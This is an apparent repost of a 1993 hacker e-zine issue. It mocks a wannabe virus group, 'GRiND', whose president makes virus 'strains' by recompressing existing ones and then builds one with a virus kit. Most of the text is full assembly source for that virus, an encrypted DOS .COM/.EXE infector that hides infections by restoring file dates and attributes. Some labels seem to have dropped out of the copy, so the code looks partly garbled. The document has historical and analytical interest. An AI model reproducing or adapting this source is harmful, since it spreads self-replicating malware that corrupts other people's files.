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2 Much Thinking Issue 1

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Published in 
2 Much Thinking
 · 12 Mar 2022


[ 22222 M M U U CCC H H ]
[ 2 2 MM MM U U C HHH (C) 1993 by 2MT ]
[ 2 M M M U U C H H ]
[ 2 M M UUU CCC H H ]
[ 2 ]
[ 2 T HHH I NN N KK I NN N G ]
[ 2 T H H I N NN K K I N NN G ^G ]
[ 22222222 T H H III N N K K III N N GGGG ]

The /<-Rad Warez D00D Presents...
----------------------* The Birth of a New Group *------------------------
/ Disclaimer: \
| If we happen to mention you in this text and you happen to find |
| it offensive well please, don't CRY! We don't give a damn if you find |
| it offensive. This is just our thoughts put into a text file and |
| released to the public. All of it is the truth and only people that |
| are hiding something will find it offensive. Enjoy... |


As of today I'm starting a new group. Just got to think of a name. How about GRIND. Wait we need the small i. That will look cool. Ya GRiND. Fits perfectly.

Now that we found a cool name we've got to take each letter and put words in so we can be like every other /<ool group.

GRiND - Great Rebellions In Need of Dicks.

Yup we've now got a wicked warez group and its gonna kick as. No wait there's too many warez groups. They are hard to run. Lets make it a Hack/Virus/Anarchy/Crack/K-RAD/Phreak/Trojan/Ansi group. Now we will kick. Look out NuKE (Just love that small u), P/S, ACiD, iCE. We are comming to take over.

Before recruting anyone we need a WHQ (World Headquarters). I don't know anyone that will want to be it so I'll run my own board. Time to set it up. That will be a lot of work but it will be worth it.

Now we need to recrute some programmers. I can't program but I thought of the groups so I will be the group president. To get new programmers I've got to advertise the group.

G R i N D
Great Rebellions In Need of Dicks
A new H/V/A/C/K/P/T/A is being started and is looking for some
programmers, artists and hackers to help rule. Download the application
generator now and send in your application. First few people can become
co-president and more.
- GRiND President -

Now to get some releases. Where's that damn virus collection. First I'll pklite a couple of viruses and make new strains. Aha.. tiny.

C:\> pklite

Now a tiny-x virus.
We need another Jerusalem strain.

C:\> pklite

Now a jerusalem-x virus.
We'll pklite nuke pox and hide the 50 damn lines of copywrite put in by rock steady. Haha shows how lame he is.

C:\> pklite

Now a nuke Pox x virus.
Our first three releases. I feel like I've made a break-thru.

Time to program some real viruses. Let me pull out that VCL. No not that... it has more bugs in it then then pussy of Nowhere Man's Mom. Let me use MPC. No how about the improved IVP v1.0. Ahhh now I'll make a wicked virus. Infects .COM/.EXE files. Changes directories doesn't get and more. Time to put in some text.

"(C) 1993 GRiND"
"Better watch out for the GRiND virus!"
"Now GRiNDing your HD and doing some damage."
"This virus is copyrite 1993 by GRiND and GRiND associates."
"We are so /<ool. Look out NuKE."
"PuKE, PuKE... Eat this." <-- attention grabber

Our first full release. Full source code and all. See the accompanying virus with this text.

There, GRiND rulez! And will be here forever. Don't Phuck with us or you will be sorry.

iN The GRiND Virus iN
DG (C) 1993 by GRiND DG
Ri Eat this NuKE! You too P/S! Ri
GR This code is 100% GRiND and 100% original WORKING Code! GR
iN iN

code segment public 'code'
assume cs:code
org 100h ; All .COM files start here

ID = 'CG' ; Id for infected files

db 0e9h,0,0 ; Jump to the next command

call realcode ; Push current location on stack
pop bp ; Get location off stack
sub bp,offset realcode ; Adjust it for our pointer
call encrypt_decrypt ; Decrypt the virus first

encrypt_start equ $ ; From here is encrypted

cmp sp,id ; COM or EXE?
je restoreEXE

lea si,[bp+offset oldjump] ; Location of old jump in si
mov di,100h ; Location of where to put it in di
push di ; Save so we could just return when done
movsb ; Move a byte
movsw ; Move a word
jmp exitrestore

push ds ; Save ExE ds
push es ; Save ExE es
push cs
pop ds ; DS now equals CS
push cs
pop es ; ES now equals CS
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word

lea dx,[bp+offset dta] ; Where to put New DTA
call set_DTA ; Move it

mov ax,3524h ; Get int 24 handler
int 21h ; To ES:BX
mov word ptr [bp+oldint24],bx ; Save it
mov word ptr [bp+oldint24+2],es

mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h

push cs ; Restore ES
pop es ; 'cuz it was changed

mov ah,47h ; Get the current directory
mov dl,0h ; On current drive
lea si,[bp+offset currentdir] ; Where to keep it
int 21h

lea dx,[bp+offset exefilespec]
call findfirst
lea dx,[bp+offset comfilespec]
call findfirst

lea dx,[bp+offset directory] ; Where to change too '..'
mov ah,3bh ; Change directory
int 21h
jnc dirloop ; If no problems the look for files

mov ah,9 ; Display string
lea dx,[bp+text]
int 21h

mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; To original
int 21h

push cs
pop ds ; Do this because the DS gets changed

lea dx,[bp+offset currentdir] ; Location Of original dir
mov ah,3bh ; Change to there
int 21h

mov dx,80h ; Location of original DTA
call set_dta ; Put it back there

cmp sp,id-4 ; EXE or COM?
jz returnEXE

retn ; Return to 100h to original jump

pop es ; Get original ES
pop ds ; Get original DS

mov ax,es
add ax,10h
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear int's because of stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
db 0eah ; Jump ssss:oooo
jmpsave dd ? ; Jump location
stacksave dd ? ; Original cs:ip
jmpsave2 dd 0fff00000h ; Used with carrier file
stacksave2 dd ?

mov ah,4eh ; Find first file
mov cx,7 ; Find all attributes

int 21h ; Find first/next file int
jc quit ; If none found then change dir

call infection ; Infect that file

mov ah,4fh ; Find next file
jmp findnext ; Jump to the loop


mov ax,3d00h ; Open file for read only
call open

mov ah,3fh ; Read from file
mov cx,1ah
lea dx,[bp+offset buffer] ; Location to store them
int 21h

mov ah,3eh ; Close file
int 21h

cmp word ptr [bp+buffer],'ZM' ; EXE?
jz checkEXE ; Why yes, yes it is!
mov ax,word ptr [bp+DTA+35] ; Get end of file name in ax
cmp ax,'DN' ; Does End in comma'ND'? (reverse order)
jz quitinfect ; Yup so get another file

mov bx,[bp+offset dta+1ah] ; Get file size
mov cx,word ptr [bp+buffer+1] ; Get jump loc of file
add cx,eof-virus+3 ; Add for virus size

cmp bx,cx ; Does file size=file jump+virus size
jz quitinfect ; Yup then get another file
jmp infectcom

cmp word ptr [bp+buffer+10h],id ; Check EXE for infection
jz quitinfect ; Already infected so close up
jmp infectexe


sub bx,3 ; Adjust for new jump
lea si,[bp+buffer]
lea di,[bp+oldjump]
mov [bp+buffer],byte ptr 0e9h
mov word ptr [bp+buffer+1],bx ; Save for later

mov cx,3 ; Number of bytes to write

jmp finishinfection
les ax,dword ptr [bp+buffer+14h] ; Load es with seg address
mov word ptr [bp+jmpsave2],ax ; save old cs:ip
mov word ptr [bp+jmpsave2+2],es

les ax,dword ptr [bp+buffer+0eh] ; save old ss:sp
mov word ptr [bp+stacksave2],es ; save old cs:ip
mov word ptr [bp+stacksave2+2],ax

mov ax, word ptr [bp+buffer+8] ; get header size
mov cl,4
shl ax,cl
xchg ax,bx
les ax,[bp+offset DTA+26] ; get files size from dta
mov dx,es ; its now in dx:ax
push ax ; save these
push dx

sub ax,bx ; subtract header size from fsize
sbb dx,0 ; subtract the carry too
mov cx,10h ; convert to segment:offset form
div cx

mov word ptr [bp+buffer+14h],dx ; put in new header
mov word ptr [bp+buffer+16h],ax ; cs:ip

mov word ptr [bp+buffer+0eh],ax ; ss:sp
mov word ptr [bp+buffer+10h],id ; put id in for later
pop dx ; get the file length back
pop ax

add ax,eof-virus ; add virus size
adc dx,0 ; add with carry

mov cl,9 ; calculates new file size
push ax
shr ax,cl
ror dx,cl
adc dx,ax
pop ax
and ah,1

mov word ptr [bp+buffer+4],dx ; save new file size in header
mov word ptr [bp+buffer+2],ax

push cs ; es = cs
pop es

mov cx,1ah ; Number of bytes to write (Header)
push cx ; save # of bytes to write
xor cx,cx ; Set attriutes to none
call attributes

mov al,2 ; open file read/write
call open

mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Location of bytes
pop cx ; Get number of bytes to write
int 21h
jc closefile

mov al,02 ; Move Fpointer to eof
Call move_fp

mov ah,2ch ; Get time for our encryption value
int 21h
cmp dh,0 ; If its seconds are zere get another
je get_time
mov [bp+enc_value],dh ; Use seconds value for encryption
call encrypt_infect ; Encrypt and infect the file
mov ax,5701h ; Set files date/time back
mov cx,word ptr [bp+dta+16h] ; Get old time from dta
mov dx,word ptr [bp+dta+18h] ; Get old date
int 21h

mov ah,3eh ; Close file
int 21h

xor cx,cx
mov cl,byte ptr [bp+dta+15h] ; Get old Attributes
call attributes


mov ah,42h ; Move file pointer
xor cx,cx ; Al has location
xor dx,dx ; Clear these
int 21h

mov ah,1ah ; Move the DTA location
int 21h

mov ah,3dh ; open file
lea dx,[bp+DTA+30] ; filename in DTA
int 21h
xchg ax,bx ; file handle in bx

mov ax,4301h ; Set attributes to cx
lea dx,[bp+DTA+30] ; filename in DTA
int 21h
int24: ; New int 24h (error) handler
mov al,3 ; Fail call
iret ; Return from int 24 call

Text db '(C) 1993 GRiND',10,13
db 'Better watch out for the GRiND virus!',10,13
db 'Now GRiNDing your HD and doing some damage.',10,13
db 'This virus is copyrite 1993 by GRiND and GRiND associates.',10,13
db 'We are so /<ool. Look out NuKE.',10,13
db 'PuKE, PuKE... Eat this.',10,13
Made_with db '[IVP]',10,13,'$' ; Please do not remove this

comfilespec db '*.com',0 ; Holds type of file to look for
exefilespec db '*.exe',0 ; Holds type of file to look for
directory db '..',0 ; Directory to change to
oldjump db 0cdh,020h,0h ; Old jump. Is int 20h for file quit

lea si,[bp+offset move_begin] ; Location of where to move from
lea di,[bp+offset workarea] ; Where to move it too
mov cx,move_end-move_begin ; Number of bytes to move
movsb ; Moves this routine into heap
loop move_loop
lea dx,[bp+offset workarea]
call dx ; Jump to that routine just moved

move_begin equ $ ; Marks beginning of move
push bx ; Save the file handle
lea dx,[bp+offset encrypt_end]
call dx ; Call the encrypt_decrypt procedure
pop bx ; Get handle back in bx and return
mov ah,40h ; Write to file
mov cx,eof-virus ; Number of bytes
lea dx,[bp+offset virus] ; Where to write from
int 21h
push bx ; Save the file handle
lea dx,[bp+offset encrypt_end]
call dx ; Decrypt the file and return
pop bx ; Get handle back in bx and return
move_end equ $ ; Marks the end of move

encrypt_end equ $ ; Marks the end of encryption

lea bx,[bp+encrypt_start] ; Where to start encryption
mov cx,encrypt_end-encrypt_start ; Number of bytes to encrypt
mov dh,[bp+enc_value] ; Value to use for encryption
mov ah,cs:[bx] ; Get a byte in ah
xor ah,dh ; Xor it
mov cs:[bx],ah ; Put it back
inc bx ; Move to next byte and loop
loop encrypt_loop

enc_value db 00h ; Hold the encryption value 00 for nul effect

eof equ $ ; Marks the end of file

workarea db move_end-move_begin dup (?) ; Holds the encrypt_infect routine
currentdir db 64 dup (?) ; Holds the current dir
dta db 42 dup (?) ; Location of new DTA
buffer db 1ah dup (?) ; Holds exe header
oldint24 dd ? ; Storage for old int 24h handler

code ends
end start


Damn we forgot to release a mag with ansi menus and all. Oh well first we have to settle in. That will come later when we have real programmers. But for now we will just work on our original releases. Next thing we will create a mutation engine to create unlimited mutations. How about a virus generator. Or totally stealth virus. Yes we will follow in NuKE's footsteps.

/ _______ \
|/ ___ \ The /<-RAD Warez D00D |
||_| \ | |
| | | |
| / / End Of File! |
| / / |
| / /_____ |
||_________| Much Thinking...(C) 1993 |

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